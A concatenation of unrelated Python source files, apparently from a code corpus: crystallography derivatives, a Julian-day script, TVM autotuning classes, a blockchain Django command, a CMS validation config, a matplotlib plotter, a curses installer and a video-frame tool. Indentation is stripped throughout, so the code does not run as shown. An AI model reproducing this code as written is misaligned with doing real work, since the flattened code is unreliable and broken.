if (not scatterer.flags.use_u_aniso()):
dpd[i_u] = d2_u_iso_u_iso
else:
paste(d2_u_star_u_star.matrix_packed_u_diagonal(), i_u)
yield dpd
def d_target_d_params(self, target):
result = flex.double()
da, db = target.da(), target.db()
for d_scatterer in self.df_d_params():
result.extend(flex.double([da * d.real + db * d.imag
for d in d_scatterer]))
return result
def d2_target_d_params(self, target):
result = []
da, db = target.da(), target.db()
daa, dbb, dab = target.daa(), target.dbb(), target.dab()
ds = list(self.df_d_params())
d2s = self.d2f_d_params()
for di0,d2i in zip(ds, d2s):
d2ij_iter = iter(d2i)
for di in di0:
row = []
for dj0 in ds:
for dj in dj0:
sum = daa * di.real * dj.real \
+ dbb * di.imag * dj.imag \
+ dab * (di.real * dj.imag + di.imag * dj.real)
if (di0 is dj0):
d2ij = next(d2ij_iter)
sum += da * d2ij.real + db * d2ij.imag
row.append(sum)
result.append(row)
return flex.double(result)
def d2_target_d_params_diag(self, target):
result = flex.double()
da, db = target.da(), target.db()
daa, dbb, dab = target.daa(), target.dbb(), target.dab()
ds = self.df_d_params()
d2sd = self.d2f_d_params_diag()
for i_scatterer,(di0,d2id) in enumerate(zip(ds, d2sd)):
for di,d2ij in zip(di0, d2id):
sum = daa * di.real * di.real \
+ dbb * di.imag * di.imag \
+ dab * 2 * di.real * di.imag \
+ da * d2ij.real + db * d2ij.imag
result.append(sum)
return result
class structure_factors:
def __init__(self, xray_structure, miller_set):
assert xray_structure.is_similar_symmetry(miller_set)
self.xray_structure = xray_structure
self.miller_indices = miller_set.indices()
def fs(self):
result = flex.complex_double()
for hkl in self.miller_indices:
result.append(structure_factor(
xray_structure=self.xray_structure, hkl=hkl).f())
return result
def f(self):
return flex.sum(self.fs())
def d_target_d_params(self, f_obs, target_type):
result = None
for hkl,obs in zip(self.miller_indices, f_obs.data()):
sf = structure_factor(xray_structure=self.xray_structure, hkl=hkl)
target = target_type(obs=obs, calc=sf.f())
contribution = sf.d_target_d_params(target=target)
if (result is None): result = contribution
else: result += contribution
return result
def d2_target_d_params(self, f_obs, target_type):
result = None
for hkl,obs in zip(self.miller_indices, f_obs.data()):
sf = structure_factor(xray_structure=self.xray_structure, hkl=hkl)
target = target_type(obs=obs, calc=sf.f())
contribution = sf.d2_target_d_params(target=target)
if (result is None): result = contribution
else: result += contribution
return result
def d2_target_d_params_diag(self, f_obs, target_type):
result = None
for hkl,obs in zip(self.miller_indices, f_obs.data()):
sf = structure_factor(xray_structure=self.xray_structure, hkl=hkl)
target = target_type(obs=obs, calc=sf.f())
contribution = sf.d2_target_d_params_diag(target=target)
if (result is None): result = contribution
else: result += contribution
return result
def d2_target_d_params_diag_cpp(self, f_obs, target_type):
da_db = flex.complex_double()
daa_dbb_dab = flex.vec3_double()
for hkl,obs in zip(self.miller_indices, f_obs.data()):
sf = structure_factor(xray_structure=self.xray_structure, hkl=hkl)
target = target_type(obs=obs, calc=sf.f())
da_db.append(complex(target.da(), target.db()))
daa_dbb_dab.append((target.daa(), target.dbb(), target.dab()))
return self.xray_structure.grads_and_curvs_target_simple(
miller_indices=f_obs.indices(), da_db=da_db, daa_dbb_dab=daa_dbb_dab)
|
1620007
|
import sys
days_in_month = [0, 31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]
def is_leap_year ( year ):
return year % 4 == 0 and ( year % 100 != 0 or year % 400 == 0 )
def julian_day (month, day, year):
jday = 0
for m in range(month):
jday += days_in_month[m]
if m == 2 and is_leap_year(year):
jday += 1
jday += day
return jday
def main():
print("Please enter three integers (a month, a day and a year): That is Julian day ", end='')
input_files = open(sys.argv[1],'r')
splitted_words = input_files.readlines()[0].split()
month = int(splitted_words[0])
days = int(splitted_words[1])
year = int(splitted_words[2])
if month < 1 or month > 12:
print ("ERROR bad month:", month)
return 1
if year < 1:
print ("ERROR bad year:", year)
return 1
days_this_month = days_in_month[month]
if month == 2 and is_leap_year(year):
days_this_month += 1
if days < 1 or days > days_this_month:
print ("ERROR bad day:", days)
return 1
print(julian_day(month, days, year))
return 0
if __name__ == "__main__":
main()
|
1620027
|
import tvm
from tvm.autotvm.measure.measure import Builder, Runner, MeasureResult, MeasureErrorNo
from flextensor.ppa_model import measure_latency
from flextensor.utils import get_iter_info
import time
class ModelBuilder(Builder):
def __init__(self, *args, **kwargs):
super(ModelBuilder, self).__init__(*args, **kwargs)
def build(self, measure_inputs):
build_results = []
for target, task, config in measure_inputs:
with target:
try:
s, bufs = task.instantiate(config)
tvm.lower(s, bufs)
build_results.append(get_iter_info(s))
except Exception as e:
print(e)
build_results.append(None)
return build_results
class ModelRunner(Runner):
def __init__(self, *args, **kwargs):
super(ModelRunner, self).__init__(*args, **kwargs)
def get_build_kwargs(self):
return {}
def run(self, measure_inputs, build_results):
results = []
for info in build_results:
l = measure_latency(info)
if l is None:
results.append(MeasureResult(
['inf'], MeasureErrorNo.RUNTIME_DEVICE, 'inf', time.time()))
else:
results.append(MeasureResult(
[float(l)], MeasureErrorNo.NO_ERROR, float(l), time.time()))
return results
|
1620040
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys, pkg_resources, imp
def __bootstrap__():
global __bootstrap__, __loader__, __file__
__file__ = pkg_resources.resource_filename(__name__, 'cython_nms.so')
__loader__ = None
del __bootstrap__, __loader__
imp.load_dynamic(__name__, __file__)
__bootstrap__()
|
1620097
|
from dataclasses import dataclass
from random import random, choice
from .. import database as db
@dataclass
class Location:
longitude: float
latitude: float
def random_location() -> Location:
"""Returns random location (lon, lat) while prioritizing (95% chance) areas with a lot of objects to export."""
if random() > 0.05:
query = db.QUERIES['locations_most_count']
else:
query = db.QUERIES['locations_random']
list_of_tuples = db.data_from_db(query, row_as=Location)
return choice(list_of_tuples)
|
1620111
|
import json
import logging
from django.db import transaction
from node.blockchain.facade import BlockchainFacade
from node.blockchain.inner_models import (
CoinTransferSignedChangeRequestMessage, Node, NodeDeclarationSignedChangeRequestMessage,
PVScheduleUpdateSignedChangeRequestMessage, SignedChangeRequest
)
from node.blockchain.inner_models.signed_change_request_message import CoinTransferTransaction
from node.blockchain.types import AccountNumber, Type
from node.core.clients.node import NodeClient
from node.core.commands import CustomCommand
from node.core.database import is_in_transaction
from node.core.utils.cryptography import derive_public_key, get_signing_key
logger = logging.getLogger(__name__)
LOCAL = 'local'
def add_common_args(parser):
parser.add_argument('node-address', help='remote node address or "local" to denote local blockchain operation')
parser.add_argument('signing-key', help='signing key or "local" to denote local node singing key')
parser.add_argument('-d', '--dry-run', action='store_true')
def get_account_lock_from_local_blockchain(public_key):
return BlockchainFacade.get_instance().get_account_lock(public_key)
def get_account_lock_from_node(node_address, public_key):
account_state = NodeClient.get_instance().get_account_state(node_address, public_key)
return account_state.account_lock
def make_message(type_, account_lock, options):
kwargs = {'account_lock': account_lock}
if type_ == Type.NODE_DECLARATION:
kwargs['node'] = Node(
identifier=derive_public_key(options['signing-key']),
fee=options['fee'],
addresses=options['address'],
)
return NodeDeclarationSignedChangeRequestMessage(**kwargs)
if type_ == Type.COIN_TRANSFER:
kwargs['txs'] = [CoinTransferTransaction.parse_raw(tx) for tx in options['transaction']]
return CoinTransferSignedChangeRequestMessage(**kwargs)
if type_ == Type.PV_SCHEDULE_UPDATE:
kwargs['schedule'] = json.loads(options['schedule'])
return PVScheduleUpdateSignedChangeRequestMessage(**kwargs)
raise NotImplementedError(f'Support for signed change request type {type_} is not implemented')
def add_block_from_signed_change_request(signed_change_request):
return BlockchainFacade.get_instance().add_block_from_signed_change_request(signed_change_request)
def send_signed_change_request(node_address, signed_change_request):
response = NodeClient.get_instance().send_signed_change_request(node_address, signed_change_request)
return response.text
class Command(CustomCommand):
help = 'Submit signed change requests of different types' # noqa: A003
@staticmethod
def add_node_declaration_arguments(subparsers):
node_declaration_parser = subparsers.add_parser(
str(Type.NODE_DECLARATION.value), help=Type.NODE_DECLARATION.name
)
add_common_args(node_declaration_parser)
node_declaration_parser.add_argument('fee', type=int)
node_declaration_parser.add_argument('address', nargs='+')
@staticmethod
def add_coin_transfer_arguments(subparsers):
coin_transfer_parser = subparsers.add_parser(str(Type.COIN_TRANSFER.value), help=Type.COIN_TRANSFER.name)
add_common_args(coin_transfer_parser)
transaction_example = CoinTransferTransaction(recipient=AccountNumber('0' * 64), amount=10,
memo='For Sam').json()
coin_transfer_parser.add_argument(
'transaction', nargs='+', help=f'Transaction JSON (example: {transaction_example})'
)
@staticmethod
def add_pv_schedule_arguments(subparsers):
pv_schedule_update_parser = subparsers.add_parser(
str(Type.PV_SCHEDULE_UPDATE.value), help=Type.PV_SCHEDULE_UPDATE.name
)
add_common_args(pv_schedule_update_parser)
schedule_example = json.dumps({
'100': AccountNumber('1' * 64),
'200': AccountNumber('2' * 64),
})
pv_schedule_update_parser.add_argument('schedule', help=f'Schedule JSON (example: {schedule_example})')
def add_arguments(self, parser):
subparsers = parser.add_subparsers(dest='type', help='Signed Change Request type')
self.add_node_declaration_arguments(subparsers)
self.add_coin_transfer_arguments(subparsers)
self.add_pv_schedule_arguments(subparsers)
def handle(self, *args, **options):
node_address = options.pop('node-address')
type_ = Type(int(options.pop('type')))
signing_key = options['signing-key']
if signing_key == LOCAL:
options['signing-key'] = signing_key = get_signing_key()
public_key = derive_public_key(signing_key)
if node_address == LOCAL:
account_lock = get_account_lock_from_local_blockchain(public_key)
else:
account_lock = get_account_lock_from_node(node_address, public_key)
message = make_message(type_, account_lock, options)
signed_change_request = SignedChangeRequest.create_from_signed_change_request_message(message, signing_key)
self.write('Generated signer change request:')
self.write(json.dumps(signed_change_request.dict(), indent=4))
if options.pop('dry_run'):
return
if node_address == LOCAL:
if is_in_transaction():
block = add_block_from_signed_change_request(signed_change_request)
else:
with transaction.atomic():
block = add_block_from_signed_change_request(signed_change_request)
self.write(f'Block added to local blockchain: {block}')
else:
self.write('Response (raw):')
self.write(send_signed_change_request(node_address, signed_change_request))
|
1620122
|
import FWCore.ParameterSet.Config as cms
process = cms.Process("HLTBTAG")
process.load("L1TriggerConfig.L1GtConfigProducers.L1GtConfig_cff")
process.load("DQMServices.Components.EDMtoMEConverter_cff")
process.load("HLTriggerOffline.Btag.HltBtagValidation_cff")
#process.load("HLTriggerOffline.Btag.HltBtagValidationFastSim_cff")
process.load("HLTriggerOffline.Btag.HltBtagPostValidation_cff")
#process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(500) )
process.DQM_BTag = cms.Path( process.hltbtagValidationSequence + process.HltBTagPostVal + process.dqmSaver)
import sys
import Utilities.General.cmssw_das_client as cmssw_das_client
def add_rawRelVals(process, inputName):
query='dataset='+inputName
dataset = cmssw_das_client.get_data(query, limit = 0)
if not dataset:
raise RuntimeError(
'Das returned no dataset parent of the input file: %s \n'
'The parenthood is needed to add RAW secondary input files' % process.source.fileNames[0]
)
for i in dataset['data']:
try: n_files = i['dataset'][0]['num_file']
except: pass
raw_files = cmssw_das_client.get_data('file '+query, limit = 0)
files = []
for i in raw_files['data']:
files.append( i['file'][0]['name'])
raw_files = ['root://cms-xrd-global.cern.ch/'+str(i) for i in files]
process.source = cms.Source("PoolSource", fileNames = cms.untracked.vstring(raw_files))
return process
add_rawRelVals(process, str(sys.argv[-1]))
#process.source = cms.Source("PoolSource",
# fileNames = cms.untracked.vstring(
#'root://cms-xrd-global.cern.ch//store/user/mdefranc/RelValTTbar_13/ttbarRelVal_noPU_3/180715_094624/0000/step2_50.root',
#)
#)
#Settings equivalent to 'RelVal' convention:
process.dqmSaver.convention = 'Offline'
process.dqmSaver.saveByRun = cms.untracked.int32(-1)
process.dqmSaver.saveAtJobEnd = cms.untracked.bool(True)
process.dqmSaver.forceRunNumber = cms.untracked.int32(1)
process.dqmSaver.workflow = "/test/RelVal/TrigVal"
process.DQMStore.verbose=0
process.options = cms.untracked.PSet(
wantSummary = cms.untracked.bool( True ),
fileMode = cms.untracked.string('FULLMERGE'),
SkipEvent = cms.untracked.vstring('ProductNotFound')
)
|
1620134
|
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.path import Path
from matplotlib.patches import PathPatch
import numpy as np
try:
numeric_types = (int, float, long)
except NameError:
numeric_types = (int, float)
class SimpleVectorPlotter(object):
"""Plots vector data represented as lists of coordinates."""
# _graphics = {}
def __init__(self, interactive, ticks=False, figsize=None, limits=None):
"""Construct a new SimpleVectorPlotter.
interactive - boolean flag denoting interactive mode
ticks - boolean flag denoting whether to show axis tickmarks
figsize - optional figure size
limits - optional geographic limits (x_min, x_max, y_min, y_max)
"""
# if figsize:
# plt.figure(num=1, figsize=figsize)
plt.figure(num=1, figsize=figsize)
self.interactive = interactive
self.ticks = ticks
if interactive:
plt.ion()
else:
plt.ioff()
if limits is not None:
self.set_limits(*limits)
if not ticks:
self.no_ticks()
plt.axis('equal')
self._graphics = {}
self._init_colors()
def adjust_markers(self):
figsize = plt.gcf().get_size_inches()
r = min(figsize[0] / 8, figsize[1] / 6)
mpl.rcParams['lines.markersize'] = 6 * r
mpl.rcParams['lines.markeredgewidth'] = 0.5 * r
mpl.rcParams['lines.linewidth'] = r
mpl.rcParams['patch.linewidth'] = r
def adjust_markersize(self, size):
figsize = plt.gcf().get_size_inches()
r = min(figsize[0] / 8, figsize[1] / 6)
return 6 * r
def axis_on(self, on):
"""Turn the axes and labels on or off."""
if on:
plt.axis('on')
else:
plt.axis('off')
def clear(self):
"""Clear the plot area."""
plt.cla()
self._graphics = {}
if not self.ticks:
self.no_ticks()
def close(self):
"""Close the plot."""
self.clear()
plt.close()
def draw(self):
"""Draw a non-interactive plot."""
plt.show()
def hide(self, name):
"""Hide the layer with the given name."""
try:
graphics = self._graphics[name]
graphic_type = type(graphics[0])
if graphic_type is mpl.lines.Line2D:
for graphic in graphics:
plt.axes().lines.remove(graphic)
elif graphic_type is mpl.patches.Polygon or graphic_type is mpl.patches.PathPatch:
for graphic in graphics:
plt.axes().patches.remove(graphic)
else:
raise RuntimeError('{} not supported'.format(graphic_type))
except (KeyError, ValueError):
pass
def plot_line(self, data, symbol='', name='', **kwargs):
"""Plot a line.
data - list of (x, y) tuples
symbol - optional pyplot symbol to draw the line with
name - optional name to assign to layer so can access it later
kwargs - optional pyplot drawing parameters
"""
graphics = self._plot_line(data, symbol, **kwargs)
self._set_graphics(graphics, name, symbol or kwargs)
def plot_multiline(self, data, symbol='', name='', **kwargs):
"""Plot a multiline.
data - list of lines, each of which is a list of (x, y) tuples
symbol - optional pyplot symbol to draw the lines with
name - optional name to assign to layer so can access it later
kwargs - optional pyplot drawing parameters
"""
has_symbol = symbol or kwargs
symbol = symbol or self._line_symbol()
graphics = self._plot_multiline(data, symbol, **kwargs)
self._set_graphics(graphics, name, has_symbol)
def plot_multipoint(self, data, symbol='', name='', **kwargs):
"""Plot a multipoint.
data - list of (x, y) tuples
symbol - optional pyplot symbol to draw the points with
name - optional name to assign to layer so can access it later
kwargs - optional pyplot drawing parameters
"""
has_symbol = symbol or kwargs
symbol = symbol or self._point_symbol()
graphics = self._plot_multipoint(data, **kwargs)
self._set_graphics(graphics, name, has_symbol)
def plot_multipolygon(self, data, color='', name='', **kwargs):
"""Plot a multipolygon.
data - list of polygons, each of which is a list of rings, each of
which is a list of (x, y) tuples
color - optional pyplot color to draw the polygons with
name - optional name to assign to layer so can access it later
kwargs - optional pyplot drawing parameters
"""
has_symbol = bool(color or kwargs)
if not ('facecolor' in kwargs or 'fc' in kwargs):
kwargs['fc'] = color or self._next_color()
graphics = self._plot_multipolygon(data, **kwargs)
self._set_graphics(graphics, name, has_symbol)
def plot_point(self, data, symbol='', name='', **kwargs):
"""Plot a point.
data - (x, y) tuple
symbol - optional pyplot symbol to draw the point with
name - optional name to assign to layer so can access it later
kwargs - optional pyplot drawing parameters
"""
has_symbol = symbol or kwargs
symbol = symbol or self._point_symbol()
graphics = self._plot_point(data, symbol, **kwargs)
self._set_graphics(graphics, name, has_symbol)
def plot_polygon(self, data, color='', name='', **kwargs):
"""Plot a polygon.
data - list of rings, each of which is a list of (x, y) tuples
color - optional pyplot color to draw the polygon with
name - optional name to assign to layer so can access it later
kwargs - optional pyplot drawing parameters
"""
has_symbol = bool(color or kwargs)
if not ('facecolor' in kwargs or 'fc' in kwargs):
kwargs['fc'] = color or self._next_color()
graphics = self._plot_polygon(data, **kwargs)
self._set_graphics(graphics, name, has_symbol)
def remove(self, name):
"""Remove a layer with the given name."""
try:
self.hide(name)
del self._graphics[name]
except KeyError:
pass
def save(self, fn, dpi=300):
plt.savefig(fn, dpi=dpi, bbox_inches='tight', pad_inches=0.02)
def set_limits(self, x_min, x_max, y_min, y_max):
"""Set geographic limits for plotting."""
self.x_lim = x_min, x_max
self.y_lim = y_min, y_max
self._set_limits()
def show(self, name):
"""Show the layer with the given name."""
try:
graphics = self._graphics[name]
graphic_type = type(graphics[0])
if graphic_type is mpl.lines.Line2D:
for graphic in graphics:
plt.axes().add_line(graphic)
elif graphic_type is mpl.patches.Polygon or graphic_type is mpl.patches.PathPatch:
for graphic in graphics:
plt.axes().add_patch(graphic)
else:
raise RuntimeError('{} not supported'.format(graphic_type))
except KeyError:
pass
def no_ticks(self):
plt.gca().get_xaxis().set_ticks([])
plt.gca().get_yaxis().set_ticks([])
def zoom(self, factor):
"""Zoom in or out by a percentage; negative is out."""
x_min, x_max, y_min, y_max = plt.axis()
x_delta = (x_max - x_min) * factor / 100
y_delta = (y_max - y_min) * factor / 100
plt.axis((x_min + x_delta, x_max - x_delta,
y_min + y_delta, y_max - y_delta))
def _clockwise(self, data):
"""Determine if points are in clockwise order."""
total = 0
x1, y1 = data[0]
for x, y in data[1:]:
total += (x - x1) * (y + y1)
x1, y1 = x, y
x, y = data[0]
total += (x - x1) * (y + y1)
return total > 0
def _codes(self, data):
"""Get a list of codes for creating a new PathPatch."""
codes = np.ones(len(data), dtype=np.int) * Path.LINETO
codes[0] = Path.MOVETO
return codes
def _init_colors(self):
if mpl.__version__ >= '1.5':
self.colors = list(mpl.rcParams['axes.prop_cycle'])
self.current_color = -1
self._next_color = self._next_color_new
else:
self._next_color = self._next_color_old
def _line_symbol(self):
"""Get a default line symbol."""
return self._next_color() + '-'
def _next_color_old(self):
"""Get the next color in the rotation."""
return next(plt.gca()._get_lines.color_cycle)
def _next_color_new(self):
"""Get the next color in the rotation."""
self.current_color += 1
if self.current_color >= len(self.colors):
self.current_color = 0
return self.colors[self.current_color]['color']
def _order_vertices(self, data, clockwise=True):
"""Order vertices in clockwise or counter-clockwise order."""
self._clockwise(data) != clockwise or data.reverse()
if data[0] != data[-1]:
data.append(data[0])
return data
def _plot_line(self, data, symbol, **kwargs):
x, y = zip(*data)
return plt.plot(x, y, symbol, **kwargs)
def _plot_multiline(self, data, symbol, **kwargs):
"""Plot a multiline."""
graphics = []
for line in data:
graphics += self._plot_line(line, symbol, **kwargs)
return graphics
def _plot_multipoint(self, data, symbol, **kwargs):
"""Plot a multipoint."""
graphics = []
for point in data:
graphics += self._plot_point(point, symbol, **kwargs)
return graphics
def _plot_multipolygon(self, data, **kwargs):
"""Plot a multipolygon."""
graphics = []
for poly in data:
graphics += self._plot_polygon(poly, **kwargs)
return graphics
def _plot_point(self, data, symbol, **kwargs):
"""Plot a point."""
return plt.plot(data[0], data[1], symbol, **kwargs)
def _plot_polygon(self, data, **kwargs):
"""Plot a polygon."""
outer = self._order_vertices(data[0], True)
inner = [self._order_vertices(d, False) for d in data[1:]]
vertices = np.concatenate(
[np.asarray(outer)] + [np.asarray(i) for i in inner])
codes = np.concatenate(
[self._codes(outer)] + [self._codes(i) for i in inner])
patch = PathPatch(Path(vertices, codes), **kwargs)
plt.axes().add_patch(patch)
return [patch]
def _point_symbol(self):
"""Get a default point symbol."""
return self._next_color() + 'o'
def _same_type(self, graphic1, graphic2):
"""Determine if two graphics are of the same type."""
if type(graphic1) is not type(graphic2):
return False
if type(graphic1) is mpl.patches.Polygon: ## huh?
return True
if len(graphic1.get_xdata()) == len(graphic2.get_xdata()):
return True
return len(graphic1.get_xdata()) > 1 and len(graphic2.get_xdata()) > 1
def _set_graphics(self, graphics, name, has_symbol):
"""Add graphics to plot."""
name = name or len(self._graphics)
if name in self._graphics:
self.hide(name)
if not has_symbol and self._same_type(graphics[0], self._graphics[name][0]):
styled_graphic = self._graphics[name][0]
for graphic in graphics:
graphic.update_from(styled_graphic)
self._graphics[name] = graphics
plt.axis('equal')
def _set_limits(self):
"""Set axis limits."""
plt.xlim(*self.x_lim)
plt.ylim(*self.y_lim)
plt.axes().set_aspect('equal')
|
1620135
|
from ....Methods import ParentMissingError
def get_is_stator(self):
"""Return True if the parent lamination is stator and False if is a rotor
Parameters
----------
self : Slot
A Slot object
Returns
-------
is_stator: bool
True if the Lamination is a stator and False if not
"""
if self.parent is not None:
return self.parent.is_stator
else:
raise ParentMissingError("Error: The slot is not inside a Lamination")
|
1620145
|
import os
import hashlib
import shutil
import curses
import curses.wrapper
from progressBar import progressBar
# Something went wrong during installation
class InstallerException(Exception):
def __init__(self, value):
self.parameter = value
def __str__(self):
return repr(self.parameter)
class Installer:
def __init__(self, stdscr, package, filesdir = "./files", installdir = "./install"):
self.stdscr = stdscr
self.filesdir = filesdir
self.installdir = installdir
self.packageName = package
def setupCurses(self):
self.titlewin = self.stdscr.subwin(1, 80, 0, 0)
self.mainwin = self.stdscr.subwin(23, 80, 1, 0)
self.progwin = self.stdscr.subwin(10, 60, 6, 10)
self.statwin = self.stdscr.subwin(1, 80, 24, 0)
self.progBar = progressBar(0, 100, 56)
curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)
curses.init_pair(2, curses.COLOR_WHITE, curses.COLOR_CYAN)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_WHITE)
curses.init_pair(4, curses.COLOR_RED, curses.COLOR_WHITE)
self.titlewin.bkgd(' ', curses.color_pair(1))
self.statwin.bkgd(' ', curses.color_pair(1))
self.mainwin.bkgd(' ', curses.color_pair(2))
self.titlewin.addstr(0, 0, "Installing " + self.packageName)
self.statwin.addstr(0, 0, "Copying files...")
self.resetProgWin()
self.stdscr.refresh()
def resetProgWin(self):
self.progwin.clear()
self.progwin.bkgd(' ', curses.color_pair(1))
self.progwin.box()
self.stdscr.move(24, 79)
def statusUpdate(self, msg):
self.statwin.clear()
self.statwin.addstr(0, 1, msg)
self.statwin.refresh()
def drawAlert(self, msg, title, colour_pair):
# split the message into more manageable chunks
msgLines = msg.rstrip().split("\n")
height = len(msgLines) + 4
errwin = self.mainwin.subwin(height, 50, (24 / 2) - (height / 2), 15)
errwin.overlay(self.progwin)
errwin.clear()
errwin.bkgd(' ', curses.color_pair(1))
errwin.box()
errwin.addstr(0, 2, " " + title + " ", curses.color_pair(colour_pair))
self.statusUpdate("Press ENTER to acknowledge")
y = 2
for i in msgLines:
if(len(i) > 50):
firstPart = i[0:46]
secondPart = i[46:]
errwin.addstr(y, 2, firstPart)
y += 1
errwin.addstr(y, 2, secondPart)
else:
errwin.addstr(y, 2, i)
y += 1
errwin.refresh()
# Wait for ENTER
while 1:
c = self.stdscr.getch()
if(c == 13 or c == 10):
break
self.mainwin.clear()
self.mainwin.refresh()
self.resetProgWin()
def drawError(self, msg, title = "Error"):
self.drawAlert(msg, title, 4)
def drawWarning(self, msg, title = "Warning"):
self.drawAlert(msg, title, 3)
def drawProgress(self, action, fileName, progress):
self.progwin.addstr(1, 2, action + ", please wait...")
self.progwin.addstr(3, 2, fileName)
self.progBar.updateAmount(progress)
self.progwin.addstr(5, 2, str(self.progBar))
self.progwin.refresh()
self.resetProgWin()
def InstallerPage(self, msg):
introwin = self.mainwin.subwin(20, 70, 3, 5)
introwin.clear()
introwin.box()
introwin.bkgd(' ', curses.color_pair(1))
msgLines = msg.split("\n")
msgNum = len(msgLines)
y = (20 / 2) - (msgNum / 2)
for i in msgLines:
introwin.addstr(y, (70 / 2) - (len(i) / 2), i)
y += 1
introwin.refresh()
self.waitForKeyPress()
self.mainwin.clear()
self.mainwin.refresh()
def introPage(self):
msg = "Welcome to the " + self.packageName + " installation!"
msg += "\n\n\n"
msg += "The next steps will guide you through the installation of " + self.packageName + "."
msg += "\n\n"
msg += "Press ENTER to continue."
self.InstallerPage(msg)
def done(self):
msg = self.packageName + " is now installed!"
msg += "\n\n\n"
msg += "Remove the CD from the disk drive and press any key to reboot."
self.InstallerPage(msg)
def selectDest(self):
pass
def installFiles(self):
# Open the file listing. This file contains information about each file that
# we are to install.
try:
fileList = open(self.filesdir + "/filelist.txt")
except:
# Pass it up to the caller
self.drawError("Couldn't open file list for reading.")
raise
self.statusUpdate("Please wait...")
# Start copying files
fileLines = fileList.read().rstrip().split("\n")
nFiles = len(fileLines)
currFileNum = 0
myProgress = 0
for line in fileLines:
# Remove trailing whitespace and split on spaces
# File format:
# <source path> <dest path> <md5> <compulsory>
line = line.rstrip()
set = line.split(" ")
if(len(set) != 4):
self.drawError("Bad set in file list:\n" + line + "\nThis set only has " + str(len(set)) + " entries")
continue
# Create directory structure if required
dirSplit = set[1].split("/")
dirSplit = dirSplit[1:-1]
if(len(dirSplit) > 0):
currPath = "/"
for dir in dirSplit:
os.mkdir(self.installdir + currPath)
# Update the progress
currFileNum += 1
myProgress = (currFileNum / float(nFiles)) * 100.0
self.drawProgress("Copying files", self.installdir + set[1], myProgress)
# Some files are meant to be empty, but present
if(len(set[0]) == 0):
f = open(self.installdir + set[1], "w")
f.close()
continue
# Copy the file
shutil.copy(self.filesdir + set[0], self.installdir + set[1])
# MD5 the newly copied file
newFile = open(self.installdir + set[1])
hex = hashlib.md5(newFile.read()).hexdigest()
newFile.close()
# Ensure the MD5 matches
if(hex != set[2]):
if(set[3] == "yes"):
self.drawError("Compulsory file failed verification:\n" + self.installdir + set[1])
raise
else:
self.drawWarning("File " + str(currFileNum) + " failed verification, continuing anyway:\n" + self.installdir + set[1])
fileList.close()
self.statusUpdate("Copy complete.")
def postInstall(self):
self.statusUpdate("Please wait...")
# Files copied, run post-install scripts now
try:
postInstallFile = open(self.filesdir + "/postinstall.txt")
contents = postInstallFile.read()
contents.rstrip()
if(len(contents)):
num = 0
for line in contents.split("\n"):
num += 1
self.drawProgress("Running script", line, (num / float(len(contents))) * 100.0)
try:
p = os.popen(line)
print p.read()
p.close()
except:
self.drawWarning("Post-install script '" + str(line) + "' failed, continuing")
else:
raise
postInstallFile.close()
except:
self.statusUpdate("Post-install scripts complete.")
def waitForKeyPress(self):
self.stdscr.getch()
|
1620181
|
from greenonbrown import green_on_brown
from imutils.video import count_frames, FileVideoStream
import numpy as np
import imutils
import glob
import cv2
import csv
import os
def frame_analysis(exgFile: str, exgsFile: str, hueFile: str, exhuFile: str, HDFile: str):
baseName = os.path.splitext(os.path.basename(exhuFile))[0]
exgVideo = cv2.VideoCapture(exgFile)
print("[INFO] Loaded {}".format(exgFile))
lenexg = count_frames(exgFile, override=True) - 1
exgsVideo = cv2.VideoCapture(exgsFile)
print("[INFO] Loaded {}".format(exgsFile))
lenexgs = count_frames(exgsFile, override=True) - 1
hueVideo = cv2.VideoCapture(hueFile)
print("[INFO] Loaded {}".format(hueFile))
lenhue = count_frames(hueFile, override=True) - 1
exhuVideo = cv2.VideoCapture(exhuFile)
print("[INFO] Loaded {}".format(exhuFile))
lenexhu = count_frames(exhuFile, override=True) - 1
videoHD = cv2.VideoCapture(HDFile)
print("[INFO] Loaded {}".format(HDFile))
lenHD = count_frames(HDFile, override=True) - 1
hdFrame = None
exgFrame = None
exgsFrame = None
hueFrame = None
exhuFrame = None
hdframecount = 0
exgframecount = 0
exgsframecount = 0
hueframecount = 0
exhuframecount = 0
hdFramesAll = []
exgFramesAll = []
exgsFramesAll = []
hueFramesAll = []
exhuFramesAll = []
while True:
k = cv2.waitKey(1) & 0xFF
if k == ord('v') or hdFrame is None:
if hdframecount >= len(hdFramesAll):
hdFrame = next(frame_processor(videoHD, 'hd'))
hdFrame = imutils.resize(hdFrame, height=640)
hdFrame = imutils.rotate(hdFrame, angle=180)
hdframecount += 1
hdFramesAll.append(hdFrame)
else:
hdFrame = hdFramesAll[hdframecount]
hdframecount += 1
if k == ord('q') or exgFrame is None:
if exgframecount >= len(exgFramesAll):
exgFrame = next(frame_processor(exgVideo, 'exg'))
exgframecount += 1
exgFramesAll.append(exgFrame)
else:
exgFrame = exgFramesAll[exgframecount]
exgframecount += 1
if k == ord('w') or exgsFrame is None:
if exgsframecount >= len(exgsFramesAll):
exgsFrame = next(frame_processor(exgsVideo, 'exgs'))
exgsframecount += 1
exgsFramesAll.append(exgsFrame)
else:
exgsFrame = exgsFramesAll[exgsframecount]
exgsframecount += 1
if k == ord('e') or hueFrame is None:
if hueframecount >= len(hueFramesAll):
hueFrame = next(frame_processor(hueVideo, 'hsv'))
hueframecount += 1
hueFramesAll.append(hueFrame)
else:
hueFrame = hueFramesAll[hueframecount]
hueframecount += 1
if k == ord('r') or exhuFrame is None:
if exhuframecount >= len(exhuFramesAll):
exhuFrame = next(frame_processor(exhuVideo, 'exhu'))
exhuframecount += 1
exhuFramesAll.append(exhuFrame)
else:
exhuFrame = exhuFramesAll[exhuframecount]
exhuframecount += 1
if k == ord('b'):
if hdframecount > 0:
hdframecount -= 1
hdFrame = hdFramesAll[hdframecount]
else:
hdFrame = hdFramesAll[hdframecount]
if k == ord('a'):
if exgframecount > 0:
exgframecount -= 1
exgFrame = exgFramesAll[exgframecount]
else:
exgFrame = exgFramesAll[exgframecount]
if k == ord('s'):
if exgsframecount > 0:
exgsframecount -= 1
exgsFrame = exgsFramesAll[exgsframecount]
else:
exgsFrame = exgsFramesAll[exgsframecount]
if k == ord('d'):
if hueframecount > 0:
hueframecount -= 1
hueFrame = hueFramesAll[hueframecount]
else:
hueFrame = hueFramesAll[hueframecount]
if k == ord('f'):
